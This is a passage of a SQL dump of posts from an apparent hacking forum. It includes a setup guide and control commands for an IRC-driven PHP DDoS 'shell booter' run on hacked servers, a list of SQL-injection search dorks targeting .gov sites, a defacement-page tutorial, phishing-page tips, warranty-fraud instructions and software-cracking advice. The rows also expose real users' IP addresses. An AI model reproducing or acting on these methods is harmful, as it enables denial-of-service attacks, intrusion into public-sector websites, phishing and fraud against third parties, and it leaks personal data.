'321f4c5f9f3ea29881426042fb80fb74', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6925', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351884211', 'What the fuck is earn\'t? -.- Why are you making LQ posts? Do you seriously care? Just take this conversation to a PM or something or talk to be on Skype about it. You don\'t have to post because it\'s LQ. Your posts are making LH LQ.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd7779d763d6544586eee78fc95e333c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6926', '1178', '6915', '35', 'RE: My new Siggy', '0', '82', 'iTzIpod', '1351884244', 'It\'s too fast that\'s all I have to say.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '85b1d5eb1338e48e3c9e67904de25402', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6927', '1179', '6920', '4', 'RE: LSD is here', '0', '82', 'iTzIpod', '1351884292', 'It\'s LSD not LCD. Hey LSD, what\'s up? Welcome to L33tHacking Enjoy your stay!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c6203c754e411fbd037796be86076ec5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6928', '1179', '6920', '4', 'RE: LSD is here', '0', '61', 'NXK', '1351889833', 'Welcome, I hope you enjoy it here. Try to be active and have fun :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '3489f235720fdd5a581e91dedfc367b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6929', '1175', '6869', '4', 'RE: Me:3', '0', '61', 'NXK', '1351889875', 'Welcome, I hope you enjoy it here. Stay HQ and follow the rules and everything should be fine mate :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'cbfd811cb77fa1583899ea7a289cb067', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6930', '1166', '6824', '46', 'RE: [Guide] Reporting Phishing Pages', '0', '53', 'sirchamp', '1351890232', '[quote]l33thacking.net then the phished URL would be l33thacking.net [/quote] I dont see any difference there.', '2.201.36.40', '46736424', '1', '0', '0', '0', '1', 'd7372c9594cade411b6853e78529af20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6931', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '228', 'VirtualLegend', '1351891839', 'I Section only for Money making; with the catogory\'s; CPA, PPD PPC etc. Maybe a Good idea ?', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'd9a8a7879a5201ad926fedea42fb310e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6932', '1175', '6876', '4', 'RE: Me:3', '0', '228', 'VirtualLegend', '1351891893', '[quote=\'iTzIpod\' pid=\'6876\' dateline=\'1351798618\'] Welcome to LH dude! Thanks VL for referring him. Enjoy your stay! [/quote] No problem bro Just want to help the forum', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '88ff9a2ab948043762e8f963a94474d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6933', '1171', '6910', '33', 'RE: Anyone have photoshop cracked?', '0', '228', 'VirtualLegend', '1351891989', '[quote=\'Triple H\' pid=\'6910\' dateline=\'1351836612\'] Ok @ timmy i dont want torrent @ virtual [/quote] Than it\'s hard to find one, because it\'s a big file', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'c38c2fa0c7447ee97b0a8cf79476dec3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6934', '1178', '6915', '35', 'RE: My new Siggy', '0', '228', 'VirtualLegend', '1351892089', 'Nah too large and it maybe looks better in the center', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '124af5044877e0cea1c2624c36aa5836', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6935', '1178', '6915', '35', 'RE: My new Siggy', '0', '257', 'XxTREYZxX', '1351892282', 'Personally i like it the way it is so yeah thanks for the opinions.', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '610562eb4c952d9186d7389a358e4dea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6936', '1177', '6905', '43', 'RE: Free itunes/app store gift cards crack', '0', '62', 'R?????zo?', '1351892683', 'Looks legit, will give it a try I think :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '51b9328a96c9062c2e1377ab148e3cfb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6937', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '82', 'iTzIpod', '1351894204', 'Will you accept Photoshop CS3/CS4 Portable? :p Because I can give you the portable version of those. (It\'s exactly the same as Photoshop CS3/CS4 just that it\'s a \'portable version\' (Allowing you to put it on a USB or so) + it takes up less space than the original. :) If you want it, just post below and I\'ll give you the DL link. If you want Photoshop CS6, I don\'t have the portable version. Nor do I know how to get it. But, I know how to get the cracked Photoshop CS6 version though (Full) Just download the trial version and then replace the amtlib.dll file or whatever it\'s called with a cracked version.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '280a5ca6f0a9ea4f3383613668d1a1a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6938', '1180', '0', '16', 'What is Social Engineering?', '0', '82', 'iTzIpod', '1351894475', '[align=center]In every service thread and eBook thread there is usually one member who wonders what social engineering is. I\'ve made this thread to assist you with the topic since when you Google \"social engineering\", you will get to a post that either states that it\'s a security breach or simply hacking. [size=medium][u][i][b][font=Arial]What is Social Engineering? [/font][/b][/i][/u][/size] Social engineering is the art of manipulation. You\'re using manipulation to obtain either free items or to obtain information though you will mainly be using the free item version of social engineering. Social engineering is illegal and can get you in legal manners if you do not know what you are doing. L33tHacking is not responsible for these acts but the reviewing team and administration will attempt to keep these sections as safe as possible. If a service or eBook is too risky, it will be closed instantly. Always look for the review written by a review team member to assure that everything is safe. [size=medium][font=Arial][u][i][b]Types of Social Engineering [/b][/i][/u][/font][/size] There are several types of social engineering to obtain items but the most common and safest one is using a warranty exploit. Using a warranty exploit basically means you are exploiting the companies warranty system. Lets use Microsoft for example, Microsoft has the best warranty support. I had broken my keyboard so I called them since I knew I had warranty on it and they shipped me a new keyboard back and I had to ship nothing back to them. In this exploit you will be telling the company that the item is broken. You shall then provide a PID, serial, or receipt to them to demonstrate that you own the item and then you will be sent a new item. If you must ship something back, be very careful, some companies will bill you if you do not ship anything back and others might even send a representative. Always ask what you must do in detail to the seller of the service or eBook. They should be able to provide you with everything you need for a warranty exploit. [size=medium][font=Arial][u][i][b]Risks of Social Engineering [/b][/i][/u][/font][/size] Always ask your seller if anything has ever gone wrong with what you or they are doing. It is very important that you always play it safe and get to know what you\'re doing before you do it because if not you can get into trouble. [size=medium][font=Arial][u][i][b]Enjoy your shopping! [/b][/i][/u][/font][/size][/align]', '24.212.197.164', '416597412', '1', '0', '82', '1351951444', '1', '432047480c174e0d5e2abe2188c0702a', '0', '1351951444'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6942', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1351896457', 'Okay, just send me a PM or IM on Skype.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '74ce6e3e6de6d853a1fe0d1336674272', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6943', '1172', '6843', '83', 'RE: [tut]How to knock someone out[/video]', '0', '228', 'VirtualLegend', '1351897157', 'The video is blocked for my country :( Using a proxy :P', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '63477e80280f2fef24b6210d2e82c980', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6944', '305', '6904', '84', 'RE: Themejunkies.net theme rip', '0', '228', 'VirtualLegend', '1351897285', '[quote=\'t3h jok3r\' pid=\'6904\' dateline=\'1351833099\'] [quote=\'VirtualLegend\' pid=\'6863\' dateline=\'1351776556\'] @t3h Jok3r F*king nice theme we need also a theme like this [/quote] D@rthforums.net, forumleague and 1 more site use the same kind of theme. [/quote] Your Right, We need to be original', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'e6aa763670c956a4fe70efcd70252a73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6945', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '228', 'VirtualLegend', '1351897431', 'Can i still join Please ?', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '7001aebd6da36b5fdb160b013ac3d122', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6946', '1181', '0', '7', 'Who wants Jok3rs private DDoSing method', '0', '5', 'Timmy', '1351916878', 'I asked Jok3r if I can post his private DDoSing method and he said he doesnt mind so do you guys want jok3rs private ddosing method. With this you can hit off sites like anarchy within 30 secs guarantee. If you have like 8 people helping you with this one then you can hit HF offline but would not recommend anyone to use on HF. This requires no booters, help from others or 100 hours. So do you want to see this? 6+ votes then I will share it.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'd47289baea1219496196922d507d0ef5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6947', '1179', '6920', '4', 'RE: LSD is here', '0', '5', 'Timmy', '1351917012', 'Welcome to L33T Hacking LSD. Hope you enjoy your stay.', '173.245.64.81', '-1376436143', '1', '0', '5', '1351917040', '1', '27fdab40e0a95829c6de32e60fbb4615', '0', '1351917040'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6948', '1166', '6930', '46', 'RE: [Guide] Reporting Phishing Pages', '0', '5', 'Timmy', '1351917183', '[quote=\'sirchamp\' pid=\'6930\' dateline=\'1351890232\'] [quote]l33thacking.net then the phished URL would be l33thacking.net [/quote] I dont see any difference there. [/quote] Lol I don\'t see any difference too. Maybe its auto correct.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '1165659224af9efa4b1eb79f717aeebe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6949', '467', '2203', '44', 'RE: Bestbuy PSD', '0', '5', 'Timmy', '1351917217', '12 views and no replies? Come on', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'b6b6cb809307ab4e94dddc03dcc05968', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6950', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '5', 'Timmy', '1351917288', 'Rolflol nice tips thanks and looks interesting.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '682a12195a22a2fb95b09f0d482fa3e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6951', '1182', '0', '3', 'Can we report dead links?', '0', '5', 'Timmy', '1351917356', 'Can we report threads with dead download links?', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'b83cbde9cb2a3ea602a829e144280a44', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6961', '1187', '0', '7', 'L33T Hacking keywords', '0', '8', 'spacefish36', '1351922442', '[code] Read the last comment before taking any action [/code] free booter coding hacking SQL Injection HTML PHP Skype resolver Hacking forums RAT Keylogger Crypter cloudflare botnet IRC E-whoring social engineering money making blackhat whitehat greyhat monetizing music top 10 music vpn java drive by java drive by setup free java drive by hosting website mybb forums proxy checker money hack hacker forum cracked exploit phishing dumps pids serials graphics photoshop gimp online DOX SEO Anonymous Hackers Hosting Review awards patch adf.ly offshore deface dork ppc advertising webmaster porn youtube bot facebook bot paypal bot brute forcer free minecraft gaming cheats email [code] This is to help build more backlinks and get more members through search engines and don\'t edit anything. [/code]', '173.245.64.81', '-1376436143', '0', '0', '0', '0', '1', '399ddb9b60eb6ced1f43aae14ef3f787', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6956', '1183', '0', '46', '[TUT] Getting Images from index', '0', '4', 'Triple H', '1351918452', 'If you are creating a phishing page to make it look more realistic you need the images on the page. This is pretty easy. 1. Right Click 2. Inspect Element 3. Find the image 4. Right click>open in new tab 5. Save the image and DON\'T RENAME anything.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '2cee5fe1a29dac59cfebc1155ad70119', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6957', '1184', '0', '67', 'Making an IRC based shell booter', '0', '4', 'Triple H', '1351918794', 'I am sharing it here as I know their are many booter owners so I know some people will find this useful. [b]Requirements:[/b] (Hacked) Webserver/Server with php engine PHP functions which are not blocked: fsocketopen(); file_get_contents(); set_time_limit(0); Access to an IRC Server/channel (can be a public one) PHP DoS Shells My php script [b]How to set it up:[/b] 1. Copy the script (at the end of this thread) and put it into an editor. 2. Configure the following things in your editor to your IRC Server: [php] //Config $IRC_SERVER = \"irc.server.com\"; $IRC_PORT = \"6667\"; $IRC_NICK = \"[BOOTER]\"; $IRC_CHANNEL = \"#channel\"; $IRC_MASTERPASS = \"password\"; 3. Save the file as shellbooter.php (can be named to anything you want) 4. Upload the file to your server 5. Run the script by visiting the website in your browser ( http://exampleserver.com/shellbooter.php ) -> The booter will join your IRC Server/Channel 6. Check your channel on your IRC Server for the booter. Setting up your list of shells: Put all your shells into a .txt file like this: Code: http://server1.com/shell.php http://server2.net/x32.php http://www.server3.info/somefolder/maybe/shell.php [/php] And upload it somewhere, where you can directly access it. For example with dropbox. [b]How to control it:[/b] You can control the booter with the following commands: [code] !join <channel> -> Join Channel !part <channel> -> Leave Channel !kill <Masterpass> -> Kills the bot !getlist <URL> -> Gets the list of shells !flood <IP> <Port> <Time (sec)> -> Flood [/code] First you need to let your booter know about your shells. You do that like this: [code] !getlist http://someserver/directlike/to/shells.txt [/code] The booter will reply with: [code] [SHELLS] - Amount of shells: XX [/code] Then you can let it boot. You do that like this (example): [code] !flood 123.123.123.123 80 20 [/code] The booter will reply with: [code] [UDP Flood] - Host: 123.123.123.123 | Port: 80 | Time: 20 | Sending to shells... [/code] That\'s all. Your IRC Booter will send the request to your shells. Feel free to mod the script or whatever you want to do with it:) [u]PHP Script:[/u] http://www.mediafire.com/?o1q3hcrfobvutp0', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'ab358ecf1f5cdfee4e5b9fc2260cf580', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6958', '1144', '6706', '11', 'RE: What can you do with?', '0', '4', 'Triple H', '1351918876', 'You can DOX them, boot them offline, send them viruses or steal all their keystrokes.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'faf619ced743584d02344bfb9c793ce6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6959', '1185', '0', '13', 'SQL Dorks for .gov', '0', '4', 'Triple H', '1351918923', '[code] inurl:index.php?id= site:*gov.pl inurl:index.php?id= site:*gov inurl:news.php?id= site:*gov.af inurl:oferta.php?id= site:*gov.af inurl:trainers.php?id= site:*gov.pl inurl:article.php?ID= site:*gov.uk inurl:play_old.php?id= site:*gov.au inurl:declaration_more.php?decl_id= site:*gov.in inurl:Pageid= site:*gov inurl:pagina.php?left= site:*.gov.au inurl:layout.php?id=120\'= site:*gov.pl inurl:principal.php?id=123\'= site:*gov.uk inurl:standard.php?base_dir= site:*gov inurl:home.php?where= site:*gov.pl inurl:page.php?sivu= site:*.pl inurl:*inc*.php?adresa= site:*gov inurl:padrao.php?str= site:*gov inurl:include.php?my= site:*.gov.af inurl:show.php?home= site:*gov.br inurl:index.php?lid=20= site:*gov.au inurl:principal.php?id=30= site:*gov inurl:file.php?id=205= site:*gov.au inurl:info.php?id=25155= site:*gov.af inurl:enter.php?id=203= site:*gov.uk inurl:general.php?id=50= site:*gov inurl:principal.php?id=705= site:*gov.za inurl:standard.php?id=303= site:*.gov.ie nurl:nota.php?v= site:*gov.bc.ca inurl:home.php?str= site:*ed.gov inurl:press.php?panel= site:*gov.mu inurl:page.php?mod= site:*gov inurl:default.php?param= site:*gov inurl:down*.php?texto= site:*go.af inurl:mod*.php?dir= site:*gov.ie inurl:view.php?where= site:*gov.za inurl:blank.php?subject= site:*gov.br inurl:path.php?play= site:*gov.uk inurl:base.php?l= site:*gov.au [/code]', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'c0abe46eabb7a5359d7400b23ca94c0a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6960', '1186', '0', '68', '[HTML]Designing a Deface page', '0', '4', 'Triple H', '1351919107', 'Hello today i\'m making a short tutorial on how to make a very simple deface page. We will do this in notepad. So open notepad. First of we start off with our title. [code] <html> <title> Hacked by V </title> [/code] Then we should add something like a picture. [code] <center> <img src=\"http://www.sociallyencrypted.net/images/g/se_logo_SH_w1_big_origclr_blue_texture.png\"/> [/code] Then we add our moving text. [code] <body onLoad=\"type_text()\" ; bgColor=black text=#00FFFF> <div style=\"width: 600px;height: 100px;\" align=\"center\"> <script language=\"Javascript\"> [/code] To make our writing show it is important you do it in this format. [code] \"Hello there, you can call me V\", \"This is my deface page tutorial\", \"I hope this tutorial is useful\" [/code] After every line we write you have to add the , for every new line. It is important you don\'t do it for your last line of text though. After we have written all our text we use this piece of code. [code] ); ); var speed=100; var index=0; text_pos=0; var str_length=tl[0].length; var contents, row; function type_text() { contents=\'\'; row=Math.max(0,index-40); while(row<index) contents += tl[row++] + \'\\r\\n\'; document.forms[0].elements[0].value = contents + tl[index].substring(0,text_pos) + \"_\"; if(text_pos++==str_length) { text_pos=0; index++; if(index!=tl.length) { str_length=tl[index].length; setTimeout(\"type_text()\",300); } } else setTimeout(\"type_text()\",speed); } [/code] Now we add our music to make it a little more interesting. [code] <p align=\"center\"> <form><textarea style=\"width:400px; height:400px; border:0px solid gray; resize:none; background-color:black;color:red; outline:0; padding:50px; border-radius:30px; -webkit-box-shadow:0px 0px 20px 1px gray;\" name=\"about\" readonly=\"readonly\" wrap=\"soft\"></textarea></form></p> </div> <br><br><br><br><br><br><br><br><br><br><br><br><br><br> <center><font color=#00FFFF></font></center> <center><font color=#00FFFF></font></center> <embed src=\"http://www.youtube.com/v/8pybAiBOupw&feature=plcp&context=C327ab00UDOEgsToPDskLGfjUZBwtQyDiT-NOUqQ8i&autoplay=1\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"1\" height=\"1\"></embed> </center> [/code] Now for our finished piece we have. [code] <html> <head> <title>Hacked by V</title> <center> <img src=\"http://www.sociallyencrypted.net/images/g/se_logo_SH_w1_big_origclr_blue_texture.png\"/> <body onLoad=\"type_text()\" ; bgColor=black text=#00FFFF> <div style=\"width: 600px;height: 100px;\" align=\"center\"> <script language=\"Javascript\"> var tl=new Array( \"Hello there, you can call me V\", \"This is my deface page tutorial\", \"I hope this tutorial is useful\" ); var speed=100; var index=0; text_pos=0; var str_length=tl[0].length; var contents, row; function type_text() { contents=\'\'; row=Math.max(0,index-40); while(row<index) contents += tl[row++] + \'\\r\\n\'; document.forms[0].elements[0].value = contents + tl[index].substring(0,text_pos) + \"_\"; if(text_pos++==str_length) { text_pos=0; index++; if(index!=tl.length) { str_length=tl[index].length; setTimeout(\"type_text()\",300); } } else setTimeout(\"type_text()\",speed); } </script> <p align=\"center\"> <form><textarea style=\"width:400px; height:400px; border:0px solid gray; resize:none; background-color:black;color:red; outline:0; padding:50px; border-radius:30px; -webkit-box-shadow:0px 0px 20px 1px gray;\" name=\"about\" readonly=\"readonly\" wrap=\"soft\"></textarea></form></p> </div> <br><br><br><br><br><br><br><br><br><br><br><br><br><br> <center><font color=#00FFFF></font></center> <center><font color=#00FFFF></font></center> <embed src=\"http://www.youtube.com/v/8pybAiBOupw&feature=plcp&context=C327ab00UDOEgsToPDskLGfjUZBwtQyDiT-NOUqQ8i&autoplay=1\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"1\" height=\"1\"></embed> </center> </body> </html> [/code] Save it as .html and voila you have finished Our finished piece. http://pastehtml.com/view/boom4o7vj.html Thank you for reading the following tutorial by rizila and good luck on making your deface page.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'f776ca68272ebf2c616c0f029a8771c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6962', '1182', '6951', '3', 'RE: Can we report dead links?', '0', '8', 'spacefish36', '1351922474', 'Yes we can. Report post as other', '173.245.64.81', '-1376436143', '0', '0', '0', '0', '1', '736269b31eeb2850aa4658de32dbde3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6963', '1180', '6938', '16', 'RE: What is Social Engineering?', '0', '1', 't3h jok3r', '1351925209', 'Thanks for taking out time to post this ipod.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b632a3a466703b35f2fee87156f90ca3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6964', '719', '3646', '16', 'RE: AstroPID Clean', '0', '1', 't3h jok3r', '1351925288', 'Can someone junk this thread? we already have a thread on this. http://l33thacking.net/thread-135.html', '72.231.24.165', '1223104677', '1', '0', '1', '1351925375', '1', '97d534f0b41cdf6719f91e5a4bffc35a', '0', '1351925375'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6965', '1182', '6951', '3', 'RE: Can we report dead links?', '0', '205', 'mothered', '1351943113', 'The question remains, what action can a staff member take with dead links? Removing the link will serve the exact same purpose, as having the link there. It\'s up to the OP to rectify It.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '32546bc3f40ed6467b3696c284950150', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6966', '1179', '6920', '4', 'RE: LSD is here', '0', '228', 'VirtualLegend', '1351948196', 'Sup LSD Welcome to l33thacking Have a nice stay here', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'ceafbcfd60cc2a8d3f6bc80c0cd49b21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES 